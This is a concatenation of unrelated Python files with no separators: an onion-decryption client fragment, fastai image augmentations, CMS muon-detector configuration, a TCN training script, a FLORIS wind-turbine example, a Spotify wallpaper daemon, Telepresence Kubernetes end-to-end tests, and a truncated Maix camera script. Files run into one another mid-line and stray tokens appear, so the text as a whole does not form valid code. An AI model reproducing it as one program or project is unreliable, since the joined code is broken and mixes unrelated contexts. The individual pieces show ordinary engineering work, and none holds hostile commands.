self.client_symkey.encode('hex') resp_sym.absorb_crypto_header(crypt_header) l, status = resp_sym.decrypt_header(header) tri_logger.debug("CC - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) body = resp_sym.decrypt_body(body) return self.peel_onion(body) 0 # AUTOGENERATED! DO NOT EDIT! File to edit: nbs/09_Data_Augmentation.ipynb (unless otherwise specified). __all__ = ['jpgcompression', 'gaussian_kernel', 'gaussian_blur', 'photonoise'] # Cell from torchvision import transforms from fastai.vision import * def _jpgcompression(x): quality = random.randrange(10, 100) x = transforms.ToPILImage()(x).convert("RGB") outputIoStream = BytesIO() x.save(outputIoStream, "JPEG", quality=quality, optimice=True) outputIoStream.seek(0) img = PIL.Image.open(outputIoStream) tensor = transforms.ToTensor()(img) return tensor # Cell jpgcompression = TfmPixel(_jpgcompression, order=10) # Cell def gaussian_kernel(size, sigma=2., dim=2, channels=3): # The gaussian kernel is the product of the gaussian function of each dimension. # kernel_size should be an odd number. kernel_size = 2*size + 1 kernel_size = [kernel_size] * dim sigma = [sigma] * dim kernel = 1 meshgrids = torch.meshgrid([torch.arange(size, dtype=torch.float32) for size in kernel_size]) for size, std, mgrid in zip(kernel_size, sigma, meshgrids): mean = (size - 1) / 2 kernel *= 1 / (std * math.sqrt(2 * math.pi)) * torch.exp(-((mgrid - mean) / (2 * std)) ** 2) # Make sure sum of values in gaussian kernel equals 1. kernel = kernel / torch.sum(kernel) # Reshape to depthwise convolutional weight kernel = kernel.view(1, 1, *kernel.size()) kernel = kernel.repeat(channels, *[1] * (kernel.dim() - 1)) return kernel # Cell def _gaussian_blur(x, kernel_size_max=5): size = random.randrange(0, kernel_size_max) kernel = gaussian_kernel(size=size) kernel_size = 2*size + 1 x = x[None,...] padding = int((kernel_size - 1) / 2) x = F.pad(x, (padding, padding, padding, padding), mode='reflect') x = torch.squeeze(F.conv2d(x, kernel, groups=3)) return x # Cell gaussian_blur = TfmPixel(_gaussian_blur) # Cell def _photonoise(x, std_max=0.001): vals = len(np.unique(x)) vals = 2 ** np.ceil(np.log2(vals)) # Generating noise for each unique value in image. x = np.random.poisson(x * vals) / float(vals) std = random.uniform(0, std_max) noise = np.random.normal(0,std,size=x.shape) x = np.maximum(0,x+noise) x = torch.Tensor(x) x.clamp_(0,1) return x # Cell photonoise = TfmPixel(_photonoise)import FWCore.ParameterSet.Config as cms import sys from SimMuon.CSCDigitizer.cscChamberMasker_cfi import cscChamberMasker as _cscChamberMasker def appendCSCChamberMaskerAtUnpacking(process): if hasattr(process,'muonCSCDigis') : sys.stderr.write("[appendCSCChamberMasker] : Found muonCSCDigis, applying filter\n") process.preCSCDigis = process.muonCSCDigis.clone() process.muonCSCDigis = _cscChamberMasker.clone() process.muonCSCDigis.stripDigiTag = cms.InputTag("preCSCDigis", "MuonCSCStripDigi") process.muonCSCDigis.wireDigiTag = cms.InputTag("preCSCDigis", "MuonCSCWireDigi") process.muonCSCDigis.comparatorDigiTag = cms.InputTag("preCSCDigis", "MuonCSCComparatorDigi") process.muonCSCDigis.rpcDigiTag = cms.InputTag("preCSCDigis", "MuonCSCRPCDigi") process.muonCSCDigis.alctDigiTag = cms.InputTag("preCSCDigis", "MuonCSCALCTDigi") process.muonCSCDigis.clctDigiTag = cms.InputTag("preCSCDigis", "MuonCSCCLCTDigi") process.filteredCscDigiSequence = cms.Sequence(process.preCSCDigis + process.muonCSCDigis) process.RawToDigi.replace(process.muonCSCDigis, process.filteredCscDigiSequence) if hasattr(process,"RandomNumberGeneratorService") : process.RandomNumberGeneratorService.muonCSCDigis = cms.PSet( initialSeed = cms.untracked.uint32(789342) ) else : process.RandomNumberGeneratorService = cms.Service( "RandomNumberGeneratorService", muonCSCDigis = cms.PSet(initialSeed = cms.untracked.uint32(789342)) ) return process def appendCSCChamberMaskerAtHLT(process): if hasattr(process,'hltMuonCSCDigis') : sys.stderr.write("[appendCSCChamberMasker] : Found hltMuonCSCDigis, applying filter\n") process.preHltCSCDigis = process.hltMuonCSCDigis.clone() process.hltMuonCSCDigis = _cscChamberMasker.clone() process.hltMuonCSCDigis.stripDigiTag = cms.InputTag("preHltCSCDigis", "MuonCSCStripDigi") process.hltMuonCSCDigis.wireDigiTag = cms.InputTag("preHltCSCDigis", "MuonCSCWireDigi") process.hltMuonCSCDigis.comparatorDigiTag = cms.InputTag("preHltCSCDigis", "MuonCSCComparatorDigi") process.hltMuonCSCDigis.rpcDigiTag = cms.InputTag("preHltCSCDigis", "MuonCSCRPCDigi") process.hltMuonCSCDigis.alctDigiTag = cms.InputTag("preHltCSCDigis", "MuonCSCALCTDigi") process.hltMuonCSCDigis.clctDigiTag = cms.InputTag("preHltCSCDigis", "MuonCSCCLCTDigi") process.filteredHltCSCDigiSequence = cms.Sequence(process.preHltCSCDigis + process.hltMuonCSCDigis) process.HLTMuonLocalRecoSequence.replace(process.hltMuonCSCDigis, process.filteredHltCSCDigiSequence) if hasattr(process,"RandomNumberGeneratorService") : process.RandomNumberGeneratorService.hltMuonCSCDigis = cms.PSet( initialSeed = cms.untracked.uint32(789342) ) else : process.RandomNumberGeneratorService = cms.Service( "RandomNumberGeneratorService", hltMuonCSCDigis = cms.PSet(initialSeed = cms.untracked.uint32(789342)) ) return process from utils import data_generator from tcn import compiled_tcn def run_task(): (x_train, y_train), (x_test, y_test) = data_generator() model = compiled_tcn(return_sequences=False, num_feat=1, num_classes=10, nb_filters=20, kernel_size=6, dilations=[2 ** i for i in range(9)], nb_stacks=1, max_len=x_train[0:1].shape[1], use_skip_connections=True) print('x_train.shape = {}'.format(x_train.shape)) print('y_train.shape = {}'.format(y_train.shape)) print('x_test.shape = {}'.format(x_test.shape)) print('y_test.shape = {}'.format(y_test.shape)) model.summary() model.fit(x_train, y_train.squeeze().argmax(axis=1), epochs=100, validation_data=(x_test, y_test.squeeze().argmax(axis=1))) if __name__ == '__main__': run_task() import numpy as np import pandas as pd import matplotlib.pyplot as plt import floris.tools as wfct print("========== visualizing flow field with one turbine =========") fi = wfct.floris_interface.FlorisInterface("examples/example_input.json") fi.reinitialize_flow_field(layout_array=([0], [0]), turbulence_intensity=[0.15]) fi.calculate_wake() # calculate turbine power output with and without turbulence correction _power = fi.get_turbine_power() turbulent_power = fi.get_turbine_power(use_turbulence_correction=True) hor_plane = fi.get_hor_plane() txt = ( str("Turbine Power Output: \n With Turbulence Correction: ") + str(turbulent_power[0] * 10 ** -6) + (" MW\n Without Turbulence Correction: ") + str(_power[0] * 10 ** -6) + str(" MW") ) fig = plt.figure(figsize=(10, 7)) ax = plt.subplot() im = wfct.visualization.visualize_cut_plane(hor_plane, ax) cbar = fig.colorbar(im, ax=ax, fraction=0.025, pad=0.04) cbar.set_label("Wind Speed (m/s)", labelpad=+10) ax.set_xlabel("Easting (m)") ax.set_ylabel("Northing (m)") plt.text(0, -0.5, txt, transform=ax.transAxes) plt.savefig("examples/other/turbine.png", format='png') plt.show() print( "========== calculating power curve at each wind speed and turbulence intensity ==========" ) sp = [ 0.1, 3.5, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, 11.0, 12.0, 13.0, 14.0, 15.0, 16.0, 17.0, 18.0, 19.0, 20.0, 21.0, 22.0, 23.0, 24.0, 30.0, ] power = np.zeros((10, 24)) ti = np.linspace(0.0, 0.5, num=10) for i in range(10): TI = [ti[i]] powers = [] for j in range(24): speed = [sp[j]] fi.reinitialize_flow_field(wind_speed=speed, turbulence_intensity=TI) fi.calculate_wake() p = fi.get_turbine_power(use_turbulence_correction=True) powers.append(p[0]) power[i] = powers print("========== plotting adjusted power curve ==========") color = [ "navy", "#014d4e", "teal", "g", "yellowgreen", "y", "orange", "red", "crimson", "maroon", ] fig = plt.subplots(figsize=(10, 7)) for i in range(10): plt.plot(sp, list(power[i, :]), c=color[i], label=str(int(ti[i] * 100)) + "%") plt.legend() plt.xlabel("Wind Speed (m/s)") plt.ylabel("Power (W)") plt.savefig("examples/other/curve.png", format='png') plt.show() background-mediad/src/background-mediad/background-mediad.py #!/usr/bin/env python3 # Background media daemon import gi gi.require_version('Playerctl', '2.0') from gi.repository import GLib, Playerctl import subprocess import re from urllib import request, parse import os.path import json import spotipy from Xlib.display import Display from spotipy.oauth2 import SpotifyClientCredentials from xdg import xdg_cache_home, xdg_config_home from pathlib import Path import tempfile player = Playerctl.Player() playing = False previousAlbumArt = None #Used to not reblur if you're listening to an album cachedir = xdg_cache_home().joinpath("background-media") configdir = xdg_config_home().joinpath("background-media") tempdir = Path(os.path.join(tempfile.gettempdir(),"background-media")) #setup dirs cachedir.mkdir(parents=True, exist_ok=True) configdir.mkdir(parents=True, exist_ok=True) tempdir.mkdir(parents=True, exist_ok=True) def getResolution(): screen = Display(':0').screen() return "{}x{}".format(screen.width_in_pixels,screen.height_in_pixels) def squareResolution(): screen = Display(':0').screen() x = screen.width_in_pixels y = screen.height_in_pixels if x >= y: return "{}x{}".format(x,x) else: return "{}x{}".format(y,y) resolution = getResolution() print(resolution) print(squareResolution()) def on_metadata(player, metadata): #print(playing) #print(metadata) if not playing: return global previousAlbumArt global resolution artUrl = None trackId = None if 'mpris:artUrl' and 'mpris:trackid' in metadata.keys(): artUrl = metadata["mpris:artUrl"] trackId = metadata["mpris:trackid"] try: artUrl =sp.track(trackId)["album"]["images"][0]["url"] except: print("couldn't find artUrl from api, using mpris") #print(sp.track(trackId)["images"]) else: return #print(imageLocation) if isinstance(trackId, str) and isinstance(artUrl, str) and trackId.startswith('spotify'): artUrl = re.sub("https?:\\/\\/open.spotify.com\\/image\\/", "https://i.scdn.co/image/", artUrl) fileName = parse.urlparse(artUrl).path.split('/')[-1] imageLocation = cachedir.joinpath(fileName) resultImage = cachedir.joinpath("result.png") print(resultImage) if not os.path.isfile(imageLocation): print("Downloading:" + artUrl) request.urlretrieve(artUrl, imageLocation) # print(artUrl) # convert ab67616d0000b27322fcfdc99b8aa0dbe167989d \( -clone 0 -blur 0x9 -resize 1920x1200\! \) \( -clone 0 \) -delete 0 -gravity center -compose over -composite result.png # to blur image if imageLocation != previousAlbumArt: print("blurring image") subprocess.run(["convert", imageLocation, "(", "-clone", "0","-resample", "50%", "-blur", "0x9", "-resize", squareResolution() + "!" , ")", "(", "-clone", "0", ")", "-delete", "0", "-gravity", "center", "-compose", "over", "-composite", resultImage]) # subprocess.run(["feh","--bg-fill",resultImage]) previousAlbumArt = imageLocation #if 'mpris:artUrl' in metadata.keys(): # print(metadata['mpris:artUrl']) def on_play(player,status): global playing playing = True print(os.path.join(tempdir,"playing")) open(tempdir.joinpath("playing"),'w') def on_pause(player,status): global playing playing = False # subprocess.run(["feh","--bg-tile",cachedir.joinpath("../background-fm/out.png")]) os.remove(tempdir.joinpath("playing")) player.connect('metadata', on_metadata) player.connect('playback-status::playing', on_play) player.connect('playback-status::paused', on_pause) # spotify auth spotifyConfig = json.loads(open(configdir.joinpath("spotify_config.json"), 'r').read()) print(spotifyConfig) sp = spotipy.Spotify(auth_manager=SpotifyClientCredentials(client_id=spotifyConfig["id"],client_secret=spotifyConfig["secret"])) main = GLib.MainLoop() main.run() """ End-to-end tests for running directly in the operating system. """ import json from unittest import TestCase, skipIf, skipUnless from subprocess import ( check_output, Popen, PIPE, CalledProcessError, check_call, run, STDOUT, ) import time import os from .utils import ( DIRECTORY, random_name, run_webserver, telepresence_version, current_namespace, OPENSHIFT, KUBECTL, query_in_k8s, ) REGISTRY = os.environ.get("TELEPRESENCE_REGISTRY", "datawire") # inject-tcp/vpn-tcp/container: TELEPRESENCE_METHOD = os.environ["TELEPRESENCE_METHOD"] # If this env variable is set, we know we're using minikube or minishift: LOCAL_VM = os.environ.get("TELEPRESENCE_LOCAL_VM") is not None EXISTING_DEPLOYMENT = """\ --- apiVersion: v1 kind: ConfigMap metadata: name: {name} namespace: {namespace} data: EXAMPLE_ENVFROM: foobar EX_MULTI_LINE: | first line (no newline before, newline after) second line (newline before and after) --- %s metadata: name: {name} namespace: {namespace} spec: replicas: {replicas} template: metadata: labels: name: {name} hello: monkeys # <-- used by volumes test spec: containers: # Extra container at start to demonstrate we can handle multiple # containers - name: getintheway image: openshift/hello-openshift resources: limits: cpu: "100m" memory: "150Mi" - name: {container_name} image: {image} envFrom: - configMapRef: name: {name} env: - name: MYENV value: hello volumeMounts: - name: podinfo mountPath: /podinfo resources: requests: cpu: "100m" memory: "150Mi" limits: cpu: "100m" memory: "150Mi" volumes: - name: podinfo downwardAPI: items: - path: "labels" fieldRef: fieldPath: metadata.labels """ if OPENSHIFT: EXISTING_DEPLOYMENT = EXISTING_DEPLOYMENT % ("""\ apiVersion: v1 kind: DeploymentConfig""",) DEPLOYMENT_TYPE = "deploymentconfig" else: EXISTING_DEPLOYMENT = EXISTING_DEPLOYMENT % ("""\ apiVersion: extensions/v1beta1 kind: Deployment""",) DEPLOYMENT_TYPE = "deployment" NAMESPACE_YAML = """\ apiVersion: v1 kind: Namespace metadata: name: {} """ def run_script_test(telepresence_args, local_command): """Run a script with Telepresence.""" p = Popen( args=["telepresence"] + telepresence_args + [ "--logfile", "-", "--method", TELEPRESENCE_METHOD, "--run-shell", ], cwd=str(DIRECTORY), stdin=PIPE, ) p.stdin.write(bytes(local_command, "ascii") + b"\n") p.stdin.flush() p.stdin.close() return p.wait() def assert_fromcluster(namespace, service_name, port, telepresence_process): """Assert that there's a webserver accessible from the cluster.""" url = "http://{}:{}/__init__.py".format(service_name, port) expected = (DIRECTORY / "__init__.py").read_bytes() for i in range(30): result = query_in_k8s(namespace, url, telepresence_process) if result != expected: time.sleep(1) else: break assert result == expected print("Hooray, got expected result when querying via cluster.") @skipIf(TELEPRESENCE_METHOD == "container", "non-Docker tests") class NativeEndToEndTests(TestCase): """ End-to-end tests on the native machine. """ def test_run_directly(self): """--run runs the command directly.""" webserver_name = run_webserver() p = Popen( args=[ "telepresence", "--method", TELEPRESENCE_METHOD, "--new-deployment", random_name(), "--logfile", "-", "--run", "python3", "tocluster.py", webserver_name, current_namespace(), ], cwd=str(DIRECTORY), ) exit_code = p.wait() assert exit_code == 113 @skipIf(TELEPRESENCE_METHOD != "vpn-tcp", "this uses vpn-tcp.") def test_run_directly_implicit_method(self): """--method is optional.""" webserver_name = run_webserver() p = Popen( args=[ "telepresence", "--new-deployment", random_name(), "--logfile", "-", "--run", "python3", "tocluster.py", webserver_name, current_namespace(), ], cwd=str(DIRECTORY), ) exit_code = p.wait() assert exit_code == 113 def test_run_directly_implicit_deployment(self): """--*deployment is optional.""" webserver_name = run_webserver() p = Popen( args=[ "telepresence", "--method", TELEPRESENCE_METHOD, "--logfile", "-", "--run", "python3", "tocluster.py", webserver_name, current_namespace(), ], cwd=str(DIRECTORY), ) exit_code = p.wait() assert exit_code == 113 @skipIf(OPENSHIFT, "OpenShift Online doesn't do namespaces") def create_namespace(self): """Create a new namespace, return its name.""" name = random_name() yaml = NAMESPACE_YAML.format(name).encode("utf-8") check_output( args=[ KUBECTL, "apply", "-f", "-", ], input=yaml, ) self.addCleanup( lambda: check_output([KUBECTL, "delete", "namespace", name]) ) return name def test_tocluster(self): """ Tests of communication to the cluster. """ webserver_name = run_webserver() exit_code = run_script_test( ["--new-deployment", random_name()], "python3 tocluster.py {} {}".format( webserver_name, current_namespace() ), ) assert exit_code == 113 def test_tocluster_with_namespace(self): """ Tests of communication to the cluster with non-default namespace. """ namespace = self.create_namespace() webserver_name = run_webserver(namespace) exit_code = run_script_test( ["--new-deployment", random_name(), "--namespace", namespace], "python3 tocluster.py {} {}".format(webserver_name, namespace), ) assert exit_code == 113 def fromcluster( self, telepresence_args, url, namespace, local_port, remote_port=None ): """ Test of communication from the cluster. Start webserver that serves files from this directory. Run HTTP query against it on the Kubernetes cluster, compare to real file. """ if remote_port is None: port_string = str(local_port) remote_port = local_port else: port_string = "{}:{}".format(local_port, remote_port) args = ["telepresence"] + telepresence_args + [ "--expose", port_string, "--logfile", "-", "--method", TELEPRESENCE_METHOD, "--run-shell", ] p = Popen(args=args, stdin=PIPE, stderr=STDOUT, cwd=str(DIRECTORY)) p.stdin.write( ("sleep 1; exec python3 -m http.server %s\n" % (local_port, )).encode("ascii") ) p.stdin.flush() try: assert_fromcluster(namespace, url, remote_port, p) finally: p.stdin.close() p.terminate() p.wait() def test_fromcluster(self): """ Communicate from the cluster to Telepresence, with default namespace. """ service_name = random_name() self.fromcluster( ["--new-deployment", service_name], service_name, current_namespace(), 12370, ) def test_fromcluster_custom_local_port(self): """ The cluster can talk to a process running in a Docker container, with the local process listening on a different port. """ service_name = random_name() remote_port = 12360 local_port = 12355 p = Popen( args=[ "telepresence", "--new-deployment", service_name, "--expose", "{}:{}".format(local_port, remote_port), "--logfile", "-", "--method", TELEPRESENCE_METHOD, "--run", "python3", "-m", "http.server", str(local_port) ], cwd=str(DIRECTORY), ) assert_fromcluster(current_namespace(), service_name, remote_port, p) p.terminate() p.wait() def test_fromcluster_with_namespace(self): """ Communicate from the cluster to Telepresence, with custom namespace. """ namespace = self.create_namespace() service_name = random_name() self.fromcluster( ["--new-deployment", service_name, "--namespace", namespace], "{}.{}.svc.cluster.local".format(service_name, namespace), namespace, 12347, ) @skipIf(OPENSHIFT, "OpenShift never allows running containers as root.") def test_fromcluster_port_lt_1024(self): """ Communicate from the cluster to Telepresence, with port<1024. """ service_name = random_name() self.fromcluster( ["--new-deployment", service_name], service_name, current_namespace(), 12399, 70, ) @skipIf(OPENSHIFT, "OpenShift never allows running containers as root.") def test_swapdeployment_fromcluster_port_lt_1024(self): """ Communicate from the cluster to Telepresence, with port<1024, using swap-deployment because omg it's a different code path. Yay. """ # Create a non-Telepresence deployment: service_name = random_name() check_call([ KUBECTL, "run", service_name, "--port=79", "--expose", "--restart=Always", "--image=openshift/hello-openshift", "--replicas=2", "--labels=telepresence-test=" + service_name, "--env=HELLO=there", ]) self.addCleanup( check_call, [KUBECTL, "delete", DEPLOYMENT_TYPE, service_name] ) self.fromcluster( ["--swap-deployment", service_name], service_name, current_namespace(), 12398, 79, ) def test_loopback(self): """The shell run by telepresence can access localhost.""" p = Popen(["python3", "-m", "http.server", "12346"], cwd=str(DIRECTORY)) def cleanup(): p.terminate() p.wait() self.addCleanup(cleanup) name = random_name() p = Popen( args=[ "telepresence", "--method", TELEPRESENCE_METHOD, "--new-deployment", name, "--run-shell", ], stdin=PIPE, stdout=PIPE, cwd=str(DIRECTORY) ) result, _ = p.communicate( b"curl --silent http://localhost:12346/test_run.py\n" ) # We're loading this file via curl, so it should have the string # "cuttlefish" which is in this comment and unlikely to appear by # accident. assert b"cuttlefish" in result def test_disconnect(self): """Telepresence exits if the connection is lost.""" exit_code = run_script_test(["--new-deployment", random_name()], "python3 disconnect.py") # Exit code 3 means proxy exited prematurely: assert exit_code == 3 @skipIf( LOCAL_VM and TELEPRESENCE_METHOD == "vpn-tcp", "--deployment doesn't work on local VMs with vpn-tcp method." ) def existingdeployment(self, namespace, script): if namespace is None: namespace = current_namespace() webserver_name = run_webserver(namespace) # Create a Deployment outside of Telepresence: name = random_name() image = "{}/telepresence-k8s:{}".format( REGISTRY, telepresence_version() ) deployment = EXISTING_DEPLOYMENT.format( name=name, container_name=name, image=image, namespace=namespace, replicas="1", ) check_output( args=[ KUBECTL, "apply", "-f", "-", ], input=deployment.encode("utf-8") ) def cleanup(): check_output([ KUBECTL, "delete", DEPLOYMENT_TYPE, name, "--namespace=" + namespace ]) check_output([ KUBECTL, "delete", "ConfigMap", name, "--namespace=" + namespace ]) self.addCleanup(cleanup) args = ["--deployment", name, "--namespace", namespace] exit_code = run_script_test( args, "python3 {} {} {}".format( script, webserver_name, namespace, ) ) assert 113 == exit_code def test_existingdeployment(self): """ Tests of communicating with existing Deployment. """ self.existingdeployment(None, "tocluster.py") def test_environmentvariables(self): """ Local processes get access to env variables directly set and set via envFrom. """ self.existingdeployment(None, "envvariables.py") def test_existingdeployment_custom_namespace(self): """ Tests of communicating with existing Deployment in a custom namespace. """ self.existingdeployment(self.create_namespace(), "tocluster.py") def test_volumes(self): """ Volumes are accessible locally. """ self.existingdeployment(None, "volumes.py") def test_unsupportedtools(self): """ Unsupported command line tools like ping fail nicely. """ p = Popen( args=[ "telepresence", "--method", TELEPRESENCE_METHOD, "--new-deployment", random_name(), "--logfile", "-", "--run", "python3", "unsupportedcli.py", ], cwd=str(DIRECTORY), ) exit_code = p.wait() assert exit_code == 113 def test_swapdeployment(self): """ --swap-deployment swaps out Telepresence pod and then swaps it back on exit, when original pod was created with `kubectl run` or `oc run`. """ # Create a non-Telepresence deployment: name = random_name() check_call([ KUBECTL, "run", name, "--restart=Always", "--image=openshift/hello-openshift", "--replicas=2", "--labels=telepresence-test=" + name, "--env=HELLO=there", ]) self.addCleanup(check_call, [KUBECTL, "delete", DEPLOYMENT_TYPE, name]) self.assert_swapdeployment(name, 2, "telepresence-test=" + name) def test_swapdeployment_swap_args(self): """ --swap-deployment swaps out Telepresence pod and overrides the entrypoint. """ # Create a non-Telepresence deployment: name = random_name() check_call([ KUBECTL, "run", name, "--restart=Always", "--image=openshift/hello-openshift", "--replicas=2", "--labels=telepresence-test=" + name, "--env=HELLO=there", "--", "/hello-openshift", ]) self.addCleanup(check_call, [KUBECTL, "delete", DEPLOYMENT_TYPE, name]) self.assert_swapdeployment(name, 2, "telepresence-test=" + name) @skipIf(not OPENSHIFT, "Only runs on OpenShift") def test_swapdeployment_ocnewapp(self): """ --swap-deployment works on pods created via `oc new-app`. """ name = random_name() check_call([ "oc", "new-app", "--name=" + name, "--docker-image=openshift/hello-openshift", "--env=HELLO=there", ]) self.addCleanup( check_call, ["oc", "delete", "dc,imagestream,service", name] ) self.assert_swapdeployment(name, 1, "app=" + name) def assert_swapdeployment(self, name, replicas, selector): """ --swap-deployment swaps out Telepresence pod and then swaps it back on exit. """ webserver_name = run_webserver() p = Popen( args=[ "telepresence", "--swap-deployment", name, "--logfile", "-", "--method", TELEPRESENCE_METHOD, "--run", "python3", "tocluster.py", webserver_name, current_namespace(), "HELLO=there" ], cwd=str(DIRECTORY), ) exit_code = p.wait() assert 113 == exit_code deployment = json.loads( str( check_output([ KUBECTL, "get", DEPLOYMENT_TYPE, name, "-o", "json", "--export" ]), "utf-8" ) ) # We swapped back: assert deployment["spec"]["replicas"] == replicas # Ensure pods swap back too: start = time.time() while time.time() - start < 60: pods = json.loads( str( check_output([ KUBECTL, "get", "pod", "--selector=" + selector, "-o", "json", "--export" ]), "utf-8" ) )["items"] if [ pod["spec"]["containers"][0]["image"] .startswith("openshift/hello-openshift") for pod in pods ] == [True] * len(pods): print("Found openshift!") return time.sleep(1) assert False, "Didn't switch back to openshift" def test_swapdeployment_explicit_container(self): """ --swap-deployment : swaps out the given container. """ # Create a non-Telepresence Deployment with multiple containers: name = random_name() container_name = random_name() deployment = EXISTING_DEPLOYMENT.format( name=name, container_name=container_name, image="openshift/hello-openshift", namespace=current_namespace(), replicas=2 ) check_output( args=[ KUBECTL, "apply", "-f", "-", ], input=deployment.encode("utf-8") ) self.addCleanup( check_output, [ KUBECTL, "delete", DEPLOYMENT_TYPE, name, ] ) p = Popen( args=[ "telepresence", "--swap-deployment", "{}:{}".format(name, container_name), "--logfile", "-", "--method", TELEPRESENCE_METHOD, "--run", "python3", "volumes.py" ], cwd=str(DIRECTORY), ) exit_code = p.wait() assert 113 == exit_code def test_swapdeployment_auto_expose(self): """ --swap-deployment auto-exposes ports listed in the Deployment. Important that the test uses port actually used by original container, otherwise we will miss bugs where a telepresence proxy container is added rather than being swapped. """ service_name = random_name() check_call([ KUBECTL, "run", service_name, "--port=8888", "--expose", "--restart=Always", "--image=openshift/hello-openshift", "--replicas=2", "--labels=telepresence-test=" + service_name, "--env=HELLO=there", ]) self.addCleanup( check_call, [KUBECTL, "delete", DEPLOYMENT_TYPE, service_name] ) port = 8888 # Explicitly do NOT use '--expose 8888', to see if it's auto-detected: p = Popen( args=[ "telepresence", "--swap-deployment", service_name, "--logfile", "-", "--method", TELEPRESENCE_METHOD, "--run", "python3", "-m", "http.server", str(port) ], cwd=str(DIRECTORY), ) assert_fromcluster(current_namespace(), service_name, port, p) p.terminate() p.wait() @skipUnless(TELEPRESENCE_METHOD == "container", "requires Docker") class DockerEndToEndTests(TestCase): """End-to-end tests on Docker.""" def get_containers(self): return set(check_output(["docker", "ps", "-q"]).split()) def setUp(self): self.containers = self.get_containers() def tearDown(self): # Ensure no container leaks time.sleep(1) assert self.containers == self.get_containers() def test_tocluster(self): """ Tests of communication to the cluster from a Docker container. """ webserver_name = run_webserver() result = run([ "telepresence", "--logfile", "-", "--method", "container", "--new-deployment", random_name(), "--docker-run", "-v", "{}:/host".format(DIRECTORY), "python:3-alpine", "python3", "/host/tocluster.py", webserver_name, current_namespace(), ]) assert result.returncode == 113 def test_fromcluster(self): """ The cluster can talk to a process running in a Docker container. """ service_name = random_name() port = 12350 p = Popen( args=[ "telepresence", "--new-deployment", service_name, "--expose", str(port), "--logfile", "-", "--method", "container", "--docker-run", "-v", "{}:/host".format(DIRECTORY), "--workdir", "/host", "python:3-alpine", "python3", "-m", "http.server", str(port) ], ) assert_fromcluster(current_namespace(), service_name, port, p) p.terminate() p.wait() def test_fromcluster_custom_local_port(self): """ The cluster can talk to a process running in a Docker container, with the local process listening on a different port. """ service_name = random_name() remote_port = 12350 local_port = 7777 p = Popen( args=[ "telepresence", "--new-deployment", service_name, "--expose", "{}:{}".format( local_port, remote_port ), "--logfile", "-", "--method", "container", "--docker-run", "-v", "{}:/host".format(DIRECTORY), "--workdir", "/host", "python:3-alpine", "python3", "-m", "http.server", str(local_port) ], ) try: assert_fromcluster( current_namespace(), service_name, remote_port, p ) finally: p.terminate() p.wait() def test_volumes(self): """ Test availability of volumes in the container. """ result = run([ "telepresence", "--logfile", "-", "--new-deployment", random_name(), "--docker-run", "-v", "{}:/host".format(DIRECTORY), "python:3-alpine", "python3", "/host/volumes_simpler.py", ]) assert result.returncode == 113 def test_env_variables(self): # Local env variables shouldn't be used environ = os.environ.copy() environ["SHOULD_NOT_BE_SET"] = "This env variable has a space" # But env variables from remote cluster should be, and tocluster.py # checks those: webserver_name = run_webserver() result = run([ "telepresence", "--logfile", "-", "--method", "container", "--new-deployment", random_name(), "--docker-run", "-v", "{}:/host".format(DIRECTORY), "python:3-alpine", "python3", "/host/tocluster.py", webserver_name, current_namespace(), ], env=environ) assert result.returncode == 113 1-10 import audio import gc import image import lcd import sensor import sys import time import uos import os from fpioa_manager import * from machine import I2C from Maix import I2S, GPIO from pmu import axp192 # # initialize # lcd.init() lcd.rotation(2) # reduce screen brightness pmu = axp192() pmu.setScreenBrightness(8) #[0..15] try: from pmu import axp192 pmu = axp192() pmu.enablePMICSleepMode(True) except: pass fm.register(board_info.SPK_SD, fm.fpioa.GPIO0) spk_sd=GPIO(GPIO.GPIO0, GPIO.OUT) spk_sd.value(1) #Enable the SPK output fm.register(board_info.SPK_DIN,fm.fpioa.I2S0_OUT_D1) fm.register(board_info.SPK_BCLK,fm.fpioa.I2S0_SCLK) fm.register(board_info.SPK_LRCLK,fm.fpioa.I2S0_WS) wav_dev = I2S(I2S.DEVICE_0) fm.register(board_info.BUTTON_A, fm.fpioa.GPIO1) but_a=GPIO(GPIO.GPIO1, GPIO.IN, GPIO.PULL_UP) #PULL_UP is required here! fm.register(board_info.BUTTON_B, fm.fpioa.GPIO2) but_b = GPIO(GPIO.GPIO2, GPIO.IN, GPIO.PULL_UP) #PULL_UP is required here! def findMaxIDinDir(dirname): larNum = -1 try: dirList = uos.listdir(dirname) for fileName in dirList: currNum = int(fileName.split(".jpg")[0]) if currNum > larNum: larNum = currNum return larNum except: return 0 def play_sound(filename): try: player = audio.Audio(path = filename) player.volume(20) wav_info = player.play_process(wav_dev) wav_dev.channel_config(wav_dev.CHANNEL_1, I2S.TRANSMITTER,resolution = I2S.RESOLUTION_16_BIT, align_mode = I2S.STANDARD_MODE) wav_dev.set_sample_rate(wav_info[1]) spk_sd.value(1) while True: ret = player.play() if ret == None: break elif ret==0: break player.finish() spk_sd.value(0) except: pass def initialize_camera(): err_counter = 0 while 1: try: sensor.reset() #Reset sensor may failed, let's try some times break except: err_counter = err_counter + 1 if err_counter == 20: lcd.draw_string(lcd.width()//2-100,lcd.height()//2-4, "Error: Sensor Init Failed", lcd.WHITE, lcd.RED) time.sleep(0.1) continue sensor.set_pixformat(sensor.RGB565) # The memory can't analyze models with resolution higher than QVGA # So better we train the model with QVGA too sensor.set_framesize(sensor.QVGA) #QVGA=320x240 #sensor.set_framesize(sensor.VGA) #VGA=640x480 # Optimze this settings to get best picture quality sensor.set_auto_exposure(False, exposure_us=500) sensor.set_auto_gain(False) #, gain_db=100) # must turn this off to prevent image washout... sensor.set_auto_whitebal(True) # turn this off for color tracking sensor.run(1) try: img = image.Image("/sd/startup.jpg") lcd.display(img) except: lcd.draw_string(lcd.width()//2-100,lcd.height()//2-4, "Error: Cannot find start.jpg", lcd.WHITE, lcd.RED) time.sleep(2) initialize_camera() currentDirectory = 1 if "sd" not in os.listdir("/"): lcd.draw_string(lcd.width()//2-96,lcd.height()//2-4, "Error: Cannot read SD Card", lcd.WHITE, lcd.RED) try: os.mkdir("/sd/train") except Exception as e: pass try: os.mkdir("/sd/vaild") except Exception as e: pass try: currentImage = max(findMaxIDinDir("/sd/train/" + str(currentDirectory)), findMaxIDinDir("/sd/vaild/" + str(currentDirectory))) + 1 except: currentImage = 0 pass isButtonPressedA = 0 isButtonPressedB = 0 try: while(True): img = sensor.snapshot() if but_a.value() == 0 and isButtonPressedA == 0: if currentImage <= 30 or currentImage > 35: try: if str(currentDirectory) not in os.listdir("/sd/train"): try: os.mkdir("/sd/train/" + str(currentDirectory)) except: pass img.save("/sd/train/" + str(currentDirectory) + "/" + str(currentImage) + 